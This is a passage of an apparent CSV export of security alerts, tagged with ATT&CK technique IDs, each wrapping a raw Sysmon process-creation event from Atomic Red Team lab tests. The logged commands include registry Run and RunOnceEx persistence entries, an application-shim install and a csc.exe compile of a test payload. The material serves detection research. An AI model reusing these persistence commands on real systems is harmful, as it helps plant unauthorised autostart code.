<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:45:55.034352Z"">
</TimeCreated>
<EventRecordID>3610</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:45:55.023</Data>
<Data Name=""ProcessGuid"">747F3D96-D7A3-5D31-0000-0010A0A22900</Data>
<Data Name=""ProcessId"">6748</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028585.172729,2019-03-20T00:49:45.172729+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:49:45.162715Z"">
</TimeCreated>
<EventRecordID>1966423</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:49:45.052</Data>
<Data Name=""ProcessGuid"">365ABB72-55E9-5C91-0000-00102EEB0700</Data>
<Data Name=""ProcessId"">2104</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q -u &quot;C:\Windows\AppPatch\Test.SDB &quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547519.48325,2019-07-19T18:45:19.483250+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:45:06.267992Z"">
</TimeCreated>
<EventRecordID>3606</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:45:06.251</Data>
<Data Name=""ProcessGuid"">747F3D96-D772-5D31-0000-00107CF02800</Data>
<Data Name=""ProcessId"">324</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547506.213488,2019-07-19T18:45:06.213488+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:45:06.196458Z"">
</TimeCreated>
<EventRecordID>3603</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:45:06.180</Data>
<Data Name=""ProcessGuid"">747F3D96-D772-5D31-0000-001031EB2800</Data>
<Data Name=""ProcessId"">6472</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547506.137175,2019-07-19T18:45:06.137175+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d &quot; C:\Path\AtomicRedTeam.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:45:06.075725Z"">
</TimeCreated>
<EventRecordID>3600</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:45:06.056</Data>
<Data Name=""ProcessGuid"">747F3D96-D772-5D31-0000-0010BEE52800</Data>
<Data Name=""ProcessId"">3216</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d &quot; C:\Path\AtomicRedTeam.dll</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547506.075725,2019-07-19T18:45:06.075725+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:44:53.402498Z"">
</TimeCreated>
<EventRecordID>3599</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:44:53.388</Data>
<Data Name=""ProcessGuid"">747F3D96-D765-5D31-0000-001024C32800</Data>
<Data Name=""ProcessId"">4264</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547493.349171,2019-07-19T18:44:53.349171+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG DELETE &quot; &quot;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic&quot; Red &quot;Team /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:44:53.330492Z"">
</TimeCreated>
<EventRecordID>3596</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:44:53.314</Data>
<Data Name=""ProcessGuid"">747F3D96-D765-5D31-0000-0010D7BD2800</Data>
<Data Name=""ProcessId"">5824</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG DELETE &quot; &quot;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic&quot; Red &quot;Team /f&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553037534.182862,2019-03-20T03:18:54.182862+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T23:18:54.172848Z"">
</TimeCreated>
<EventRecordID>1966634</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""988"" ThreadID=""1644"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 23:13:38.586</Data>
<Data Name=""ProcessGuid"">365ABB72-77A2-5C91-0000-00100A570100</Data>
<Data Name=""ProcessId"">1636</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-777F-5C91-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-777F-5C91-0000-00100B590000</Data>
<Data Name=""ParentProcessId"">516</Data>
<Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553037534.172848,2019-03-20T03:18:54.172848+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T23:18:54.172848Z"">
</TimeCreated>
<EventRecordID>1966633</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""988"" ThreadID=""1644"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 23:13:38.576</Data>
<Data Name=""ProcessGuid"">365ABB72-77A2-5C91-0000-00106D560100</Data>
<Data Name=""ProcessId"">1628</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-777F-5C91-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-777F-5C91-0000-00100B590000</Data>
<Data Name=""ParentProcessId"">516</Data>
<Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547493.258049,2019-07-19T18:44:53.258049+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG ADD &quot; &quot;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic&quot; Red &quot;Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:44:53.219598Z"">
</TimeCreated>
<EventRecordID>3593</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:44:53.201</Data>
<Data Name=""ProcessGuid"">747F3D96-D765-5D31-0000-001027B72800</Data>
<Data Name=""ProcessId"">6584</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;REG ADD &quot; &quot;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic&quot; Red &quot;Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547466.222431,2019-07-19T18:44:26.222431+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:44:09.351888Z"">
</TimeCreated>
<EventRecordID>3588</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:44:09.337</Data>
<Data Name=""ProcessGuid"">747F3D96-D739-5D31-0000-0010B2C22600</Data>
<Data Name=""ProcessId"">6896</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
